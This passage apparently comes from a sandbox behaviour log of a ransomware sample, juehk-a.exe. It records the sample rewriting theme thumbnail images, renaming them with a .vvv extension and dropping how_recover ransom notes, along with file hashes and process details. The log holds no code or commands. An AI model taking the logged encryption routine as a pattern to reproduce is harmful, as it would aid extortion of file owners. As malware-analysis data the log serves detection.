21077.          CreateOptions: 0x60
21078.        file:
21079.          timestamp: 83389
21080.          mode: close
21081.          sequenceNumber: 1485
21082.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.html
21083.          filesize: 9480
21084.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21085.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21086.          processinfo:
21087.            pid: 1648
21088.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21089.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21090.            ads:
21091.          fid (ads:): 562949953521293
21092.          ntstatus: 0x0
21093.          CreateOptions: 0x0
21094.        file:
21095.          timestamp: 83397
21096.          mode: open
21097.          sequenceNumber: 1486
21098.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG
21099.          filesize: 29925
21100.          processinfo:
21101.            pid: 1648
21102.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21103.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21104.            ads:
21105.          fid (ads:): 562949953499617
21106.          ntstatus: 0x0
21107.          CreateOptions: 0x60
21108.        file:
21109.          timestamp: 83534
21110.          mode: close
21111.          sequenceNumber: 1487
21112.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG
21113.          filesize: 30350
21114.          md5sum: 7c444a0f07d11fcb73915eaefcedb527
21115.          sha1sum: 1e316575110adc3141600600130eb436e0076f8b
21116.          processinfo:
21117.            pid: 1648
21118.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21119.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21120.            ads:
21121.          fid (ads:): 562949953499617
21122.          ntstatus: 0x0
21123.          CreateOptions: 0x0
21124.        file:
21125.          timestamp: 83543
21126.          mode: rename
21127.          sequenceNumber: 1488
21128.          filesize: 30350
21129.          md5sum: 7c444a0f07d11fcb73915eaefcedb527
21130.          sha1sum: 1e316575110adc3141600600130eb436e0076f8b
21131.          processinfo:
21132.            pid: 1648
21133.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21134.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21135.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG
21136.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG.vvv
21137.            ads:
21138.          fid (ads:): 562949953499617
21139.          ntstatus: 0x0
21140.          CreateOptions: 0x0
21141.        file:
21142.          timestamp: 83563
21143.          mode: created
21144.          sequenceNumber: 1489
21145.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.txt
21146.          processinfo:
21147.            pid: 1648
21148.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21149.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21150.            ads:
21151.          fid (ads:): 2251799813776191
21152.          ntstatus: 0x0
21153.          CreateOptions: 0x60
21154.        file:
21155.          timestamp: 83569
21156.          mode: close
21157.          sequenceNumber: 1490
21158.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.txt
21159.          filesize: 2673
21160.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21161.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21162.          processinfo:
21163.            pid: 1648
21164.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21165.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21166.            ads:
21167.          fid (ads:): 2251799813776191
21168.          ntstatus: 0x0
21169.          CreateOptions: 0x0
21170.        file:
21171.          timestamp: 83577
21172.          mode: created
21173.          sequenceNumber: 1491
21174.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.html
21175.          processinfo:
21176.            pid: 1648
21177.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21178.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21179.            ads:
21180.          fid (ads:): 562949953521294
21181.          ntstatus: 0x0
21182.          CreateOptions: 0x60
21183.        file:
21184.          timestamp: 83583
21185.          mode: close
21186.          sequenceNumber: 1492
21187.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.html
21188.          filesize: 9480
21189.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21190.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21191.          processinfo:
21192.            pid: 1648
21193.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21194.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21195.            ads:
21196.          fid (ads:): 562949953521294
21197.          ntstatus: 0x0
21198.          CreateOptions: 0x0
21199.        file:
21200.          timestamp: 83590
21201.          mode: open
21202.          sequenceNumber: 1493
21203.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG
21204.          filesize: 20371
21205.          processinfo:
21206.            pid: 1648
21207.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21208.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21209.            ads:
21210.          fid (ads:): 562949953499618
21211.          ntstatus: 0x0
21212.          CreateOptions: 0x60
21213.        file:
21214.          timestamp: 83624
21215.          mode: close
21216.          sequenceNumber: 1494
21217.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG
21218.          filesize: 20798
21219.          md5sum: 68296a4a2b02be75fb2f54bdbe3d8a9b
21220.          sha1sum: 0b50e19d998a5e047630975f957397a58c655d88
21221.          processinfo:
21222.            pid: 1648
21223.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21224.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21225.            ads:
21226.          fid (ads:): 562949953499618
21227.          ntstatus: 0x0
21228.          CreateOptions: 0x0
21229.        file:
21230.          timestamp: 83640
21231.          mode: rename
21232.          sequenceNumber: 1495
21233.          filesize: 20798
21234.          md5sum: 68296a4a2b02be75fb2f54bdbe3d8a9b
21235.          sha1sum: 0b50e19d998a5e047630975f957397a58c655d88
21236.          processinfo:
21237.            pid: 1648
21238.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21239.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21240.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG
21241.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG.vvv
21242.            ads:
21243.          fid (ads:): 562949953499618
21244.          ntstatus: 0x0
21245.          CreateOptions: 0x0
21246.        file:
21247.          timestamp: 83649
21248.          mode: created
21249.          sequenceNumber: 1496
21250.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.txt
21251.          processinfo:
21252.            pid: 1648
21253.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21254.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21255.            ads:
21256.          fid (ads:): 562949953521295
21257.          ntstatus: 0x0
21258.          CreateOptions: 0x60
21259.        file:
21260.          timestamp: 83656
21261.          mode: close
21262.          sequenceNumber: 1497
21263.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.txt
21264.          filesize: 2673
21265.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21266.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21267.          processinfo:
21268.            pid: 1648
21269.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21270.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21271.            ads:
21272.          fid (ads:): 562949953521295
21273.          ntstatus: 0x0
21274.          CreateOptions: 0x0
21275.        file:
21276.          timestamp: 83664
21277.          mode: created
21278.          sequenceNumber: 1498
21279.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.html
21280.          processinfo:
21281.            pid: 1648
21282.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21283.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21284.            ads:
21285.          fid (ads:): 562949953521296
21286.          ntstatus: 0x0
21287.          CreateOptions: 0x60
21288.        file:
21289.          timestamp: 83671
21290.          mode: close
21291.          sequenceNumber: 1499
21292.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.html
21293.          filesize: 9480
21294.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21295.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21296.          processinfo:
21297.            pid: 1648
21298.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21299.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21300.            ads:
21301.          fid (ads:): 562949953521296
21302.          ntstatus: 0x0
21303.          CreateOptions: 0x0
21304.        file:
21305.          timestamp: 83679
21306.          mode: open
21307.          sequenceNumber: 1500
21308.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG
21309.          filesize: 20575
21310.          processinfo:
21311.            pid: 1648
21312.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21313.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21314.            ads:
21315.          fid (ads:): 562949953499619
21316.          ntstatus: 0x0
21317.          CreateOptions: 0x60
21318.        file:
21319.          timestamp: 83770
21320.          mode: close
21321.          sequenceNumber: 1501
21322.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG
21323.          filesize: 20990
21324.          md5sum: 607cfa77211346e27fd95ce64b33adc3
21325.          sha1sum: e98d50071133d5f714ee0daa6eaa79557f6fa39a
21326.          processinfo:
21327.            pid: 1648
21328.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21329.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21330.            ads:
21331.          fid (ads:): 562949953499619
21332.          ntstatus: 0x0
21333.          CreateOptions: 0x0
21334.        file:
21335.          timestamp: 83815
21336.          mode: rename
21337.          sequenceNumber: 1502
21338.          filesize: 20990
21339.          md5sum: 607cfa77211346e27fd95ce64b33adc3
21340.          sha1sum: e98d50071133d5f714ee0daa6eaa79557f6fa39a
21341.          processinfo:
21342.            pid: 1648
21343.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21344.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21345.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG
21346.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG.vvv
21347.            ads:
21348.          fid (ads:): 562949953499619
21349.          ntstatus: 0x0
21350.          CreateOptions: 0x0
21351.        file:
21352.          timestamp: 83830
21353.          mode: created
21354.          sequenceNumber: 1503
21355.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.txt
21356.          processinfo:
21357.            pid: 1648
21358.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21359.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21360.            ads:
21361.          fid (ads:): 562949953521297
21362.          ntstatus: 0x0
21363.          CreateOptions: 0x60
21364.        file:
21365.          timestamp: 83836
21366.          mode: close
21367.          sequenceNumber: 1504
21368.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.txt
21369.          filesize: 2673
21370.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21371.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21372.          processinfo:
21373.            pid: 1648
21374.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21375.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21376.            ads:
21377.          fid (ads:): 562949953521297
21378.          ntstatus: 0x0
21379.          CreateOptions: 0x0
21380.        file:
21381.          timestamp: 83843
21382.          mode: created
21383.          sequenceNumber: 1505
21384.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.html
21385.          processinfo:
21386.            pid: 1648
21387.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21388.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21389.            ads:
21390.          fid (ads:): 562949953521298
21391.          ntstatus: 0x0
21392.          CreateOptions: 0x60
21393.        file:
21394.          timestamp: 83850
21395.          mode: close
21396.          sequenceNumber: 1506
21397.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.html
21398.          filesize: 9480
21399.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21400.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21401.          processinfo:
21402.            pid: 1648
21403.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21404.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21405.            ads:
21406.          fid (ads:): 562949953521298
21407.          ntstatus: 0x0
21408.          CreateOptions: 0x0
21409.        file:
21410.          timestamp: 83862
21411.          mode: open
21412.          sequenceNumber: 1507
21413.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG
21414.          filesize: 28595
21415.          processinfo:
21416.            pid: 1648
21417.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21418.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21419.            ads:
21420.          fid (ads:): 562949953499620
21421.          ntstatus: 0x0
21422.          CreateOptions: 0x60
21423.        file:
21424.          timestamp: 83906
21425.          mode: close
21426.          sequenceNumber: 1508
21427.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG
21428.          filesize: 29022
21429.          md5sum: 4a330121b7775a1e46c3bdbccd5d5976
21430.          sha1sum: d17df933b7883c8cfe92b5a0aff964df54fd113a
21431.          processinfo:
21432.            pid: 1648
21433.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21434.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21435.            ads:
21436.          fid (ads:): 562949953499620
21437.          ntstatus: 0x0
21438.          CreateOptions: 0x0
21439.        file:
21440.          timestamp: 83915
21441.          mode: rename
21442.          sequenceNumber: 1509
21443.          filesize: 29022
21444.          md5sum: 4a330121b7775a1e46c3bdbccd5d5976
21445.          sha1sum: d17df933b7883c8cfe92b5a0aff964df54fd113a
21446.          processinfo:
21447.            pid: 1648
21448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21450.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG
21451.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG.vvv
21452.            ads:
21453.          fid (ads:): 562949953499620
21454.          ntstatus: 0x0
21455.          CreateOptions: 0x0
21456.        file:
21457.          timestamp: 83929
21458.          mode: created
21459.          sequenceNumber: 1510
21460.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.txt
21461.          processinfo:
21462.            pid: 1648
21463.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21464.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21465.            ads:
21466.          fid (ads:): 562949953521299
21467.          ntstatus: 0x0
21468.          CreateOptions: 0x60
21469.        file:
21470.          timestamp: 83936
21471.          mode: close
21472.          sequenceNumber: 1511
21473.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.txt
21474.          filesize: 2673
21475.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21476.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21477.          processinfo:
21478.            pid: 1648
21479.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21480.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21481.            ads:
21482.          fid (ads:): 562949953521299
21483.          ntstatus: 0x0
21484.          CreateOptions: 0x0
21485.        file:
21486.          timestamp: 83950
21487.          mode: created
21488.          sequenceNumber: 1512
21489.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.html
21490.          processinfo:
21491.            pid: 1648
21492.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21493.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21494.            ads:
21495.          fid (ads:): 562949953521300
21496.          ntstatus: 0x0
21497.          CreateOptions: 0x60
21498.        file:
21499.          timestamp: 83955
21500.          mode: close
21501.          sequenceNumber: 1513
21502.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.html
21503.          filesize: 9480
21504.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21505.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21506.          processinfo:
21507.            pid: 1648
21508.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21509.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21510.            ads:
21511.          fid (ads:): 562949953521300
21512.          ntstatus: 0x0
21513.          CreateOptions: 0x0
21514.        file:
21515.          timestamp: 83960
21516.          mode: open
21517.          sequenceNumber: 1514
21518.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG
21519.          filesize: 33277
21520.          processinfo:
21521.            pid: 1648
21522.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21523.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21524.            ads:
21525.          fid (ads:): 562949953499621
21526.          ntstatus: 0x0
21527.          CreateOptions: 0x60
21528.        file:
21529.          timestamp: 84032
21530.          mode: close
21531.          sequenceNumber: 1515
21532.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG
21533.          filesize: 33694
21534.          md5sum: d6e344f5fd643096eb36c064ad7d4f4d
21535.          sha1sum: 9ec3a098d6d9bfbefc4aa3b242c034d2b251a2b4
21536.          processinfo:
21537.            pid: 1648
21538.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21539.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21540.            ads:
21541.          fid (ads:): 562949953499621
21542.          ntstatus: 0x0
21543.          CreateOptions: 0x0
21544.        file:
21545.          timestamp: 84045
21546.          mode: rename
21547.          sequenceNumber: 1516
21548.          filesize: 33694
21549.          md5sum: d6e344f5fd643096eb36c064ad7d4f4d
21550.          sha1sum: 9ec3a098d6d9bfbefc4aa3b242c034d2b251a2b4
21551.          processinfo:
21552.            pid: 1648
21553.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21554.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21555.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG
21556.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG.vvv
21557.            ads:
21558.          fid (ads:): 562949953499621
21559.          ntstatus: 0x0
21560.          CreateOptions: 0x0
21561.        file:
21562.          timestamp: 84054
21563.          mode: created
21564.          sequenceNumber: 1517
21565.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.txt
21566.          processinfo:
21567.            pid: 1648
21568.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21569.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21570.            ads:
21571.          fid (ads:): 1125899906941155
21572.          ntstatus: 0x0
21573.          CreateOptions: 0x60
21574.        file:
21575.          timestamp: 84061
21576.          mode: close
21577.          sequenceNumber: 1518
21578.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.txt
21579.          filesize: 2673
21580.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21581.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21582.          processinfo:
21583.            pid: 1648
21584.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21585.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21586.            ads:
21587.          fid (ads:): 1125899906941155
21588.          ntstatus: 0x0
21589.          CreateOptions: 0x0
21590.        file:
21591.          timestamp: 84070
21592.          mode: created
21593.          sequenceNumber: 1519
21594.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.html
21595.          processinfo:
21596.            pid: 1648
21597.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21598.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21599.            ads:
21600.          fid (ads:): 562949953521301
21601.          ntstatus: 0x0
21602.          CreateOptions: 0x60
21603.        file:
21604.          timestamp: 84077
21605.          mode: close
21606.          sequenceNumber: 1520
21607.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.html
21608.          filesize: 9480
21609.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21610.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21611.          processinfo:
21612.            pid: 1648
21613.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21614.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21615.            ads:
21616.          fid (ads:): 562949953521301
21617.          ntstatus: 0x0
21618.          CreateOptions: 0x0
21619.        file:
21620.          timestamp: 84177
21621.          mode: open
21622.          sequenceNumber: 1521
21623.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG
21624.          filesize: 25106
21625.          processinfo:
21626.            pid: 1648
21627.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21628.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21629.            ads:
21630.          fid (ads:): 562949953499622
21631.          ntstatus: 0x0
21632.          CreateOptions: 0x60
21633.        high_cpu:
21634.          timestamp: 84256
21635.          sequenceNumber: 1522
21636.          total_cpu: 78.676329185520359
21637.          processinfo:
21638.            tainted: true
21639.            pid: 2312
21640.            process_cpu: 78.676329185520359
21641.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
21642.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21643.        file:
21644.          timestamp: 84387
21645.          mode: close
21646.          sequenceNumber: 1523
21647.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG
21648.          filesize: 25534
21649.          md5sum: adceff70d845e14fd70991c5869ae8b1
21650.          sha1sum: ee3b020bedb44658451ff11902fc6637c4728b33
21651.          processinfo:
21652.            pid: 1648
21653.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21654.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21655.            ads:
21656.          fid (ads:): 562949953499622
21657.          ntstatus: 0x0
21658.          CreateOptions: 0x0
21659.        file:
21660.          timestamp: 84405
21661.          mode: rename
21662.          sequenceNumber: 1524
21663.          filesize: 25534
21664.          md5sum: adceff70d845e14fd70991c5869ae8b1
21665.          sha1sum: ee3b020bedb44658451ff11902fc6637c4728b33
21666.          processinfo:
21667.            pid: 1648
21668.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21669.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21670.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG
21671.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG.vvv
21672.            ads:
21673.          fid (ads:): 562949953499622
21674.          ntstatus: 0x0
21675.          CreateOptions: 0x0
21676.        file:
21677.          timestamp: 84424
21678.          mode: created
21679.          sequenceNumber: 1525
21680.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.txt
21681.          processinfo:
21682.            pid: 1648
21683.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21684.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21685.            ads:
21686.          fid (ads:): 562949953521302
21687.          ntstatus: 0x0
21688.          CreateOptions: 0x60
21689.        file:
21690.          timestamp: 84430
21691.          mode: close
21692.          sequenceNumber: 1526
21693.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.txt
21694.          filesize: 2673
21695.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21696.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21697.          processinfo:
21698.            pid: 1648
21699.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21701.            ads:
21702.          fid (ads:): 562949953521302
21703.          ntstatus: 0x0
21704.          CreateOptions: 0x0
21705.        file:
21706.          timestamp: 84439
21707.          mode: created
21708.          sequenceNumber: 1527
21709.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.html
21710.          processinfo:
21711.            pid: 1648
21712.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21713.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21714.            ads:
21715.          fid (ads:): 562949953521303
21716.          ntstatus: 0x0
21717.          CreateOptions: 0x60
21718.        file:
21719.          timestamp: 84444
21720.          mode: close
21721.          sequenceNumber: 1528
21722.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.html
21723.          filesize: 9480
21724.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21725.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21726.          processinfo:
21727.            pid: 1648
21728.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21729.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21730.            ads:
21731.          fid (ads:): 562949953521303
21732.          ntstatus: 0x0
21733.          CreateOptions: 0x0
21734.        file:
21735.          timestamp: 84452
21736.          mode: open
21737.          sequenceNumber: 1529
21738.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG
21739.          filesize: 32403
21740.          processinfo:
21741.            pid: 1648
21742.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21743.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21744.            ads:
21745.          fid (ads:): 562949953499623
21746.          ntstatus: 0x0
21747.          CreateOptions: 0x60
21748.        apicall:
21749.          timestamp: 84667
21750.          repeat: 6000
21751.          sequenceNumber: 1530
21752.          processinfo:
21753.            pid: 1648
21754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21756.          dllname: kernel32.dll
21757.          apiname: Sleep
21758.          address: 0x0041ed5b
21759.        file:
21760.          timestamp: 84770
21761.          mode: close
21762.          sequenceNumber: 1531
21763.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG
21764.          filesize: 32830
21765.          md5sum: 952616ee19f2c191a29c4ea0ddb35be8
21766.          sha1sum: 9b0c9c14eaf9470e38f13e1632e314f4e5f779fc
21767.          processinfo:
21768.            pid: 1648
21769.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21771.            ads:
21772.          fid (ads:): 562949953499623
21773.          ntstatus: 0x0
21774.          CreateOptions: 0x0
21775.        file:
21776.          timestamp: 84778
21777.          mode: rename
21778.          sequenceNumber: 1532
21779.          filesize: 32830
21780.          md5sum: 952616ee19f2c191a29c4ea0ddb35be8
21781.          sha1sum: 9b0c9c14eaf9470e38f13e1632e314f4e5f779fc
21782.          processinfo:
21783.            pid: 1648
21784.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21786.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG
21787.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG.vvv
21788.            ads:
21789.          fid (ads:): 562949953499623
21790.          ntstatus: 0x0
21791.          CreateOptions: 0x0
21792.        file:
21793.          timestamp: 84785
21794.          mode: created
21795.          sequenceNumber: 1533
21796.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.txt
21797.          processinfo:
21798.            pid: 1648
21799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21801.            ads:
21802.          fid (ads:): 562949953521304
21803.          ntstatus: 0x0
21804.          CreateOptions: 0x60
21805.        file:
21806.          timestamp: 84791
21807.          mode: close
21808.          sequenceNumber: 1534
21809.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.txt
21810.          filesize: 2673
21811.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21812.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21813.          processinfo:
21814.            pid: 1648
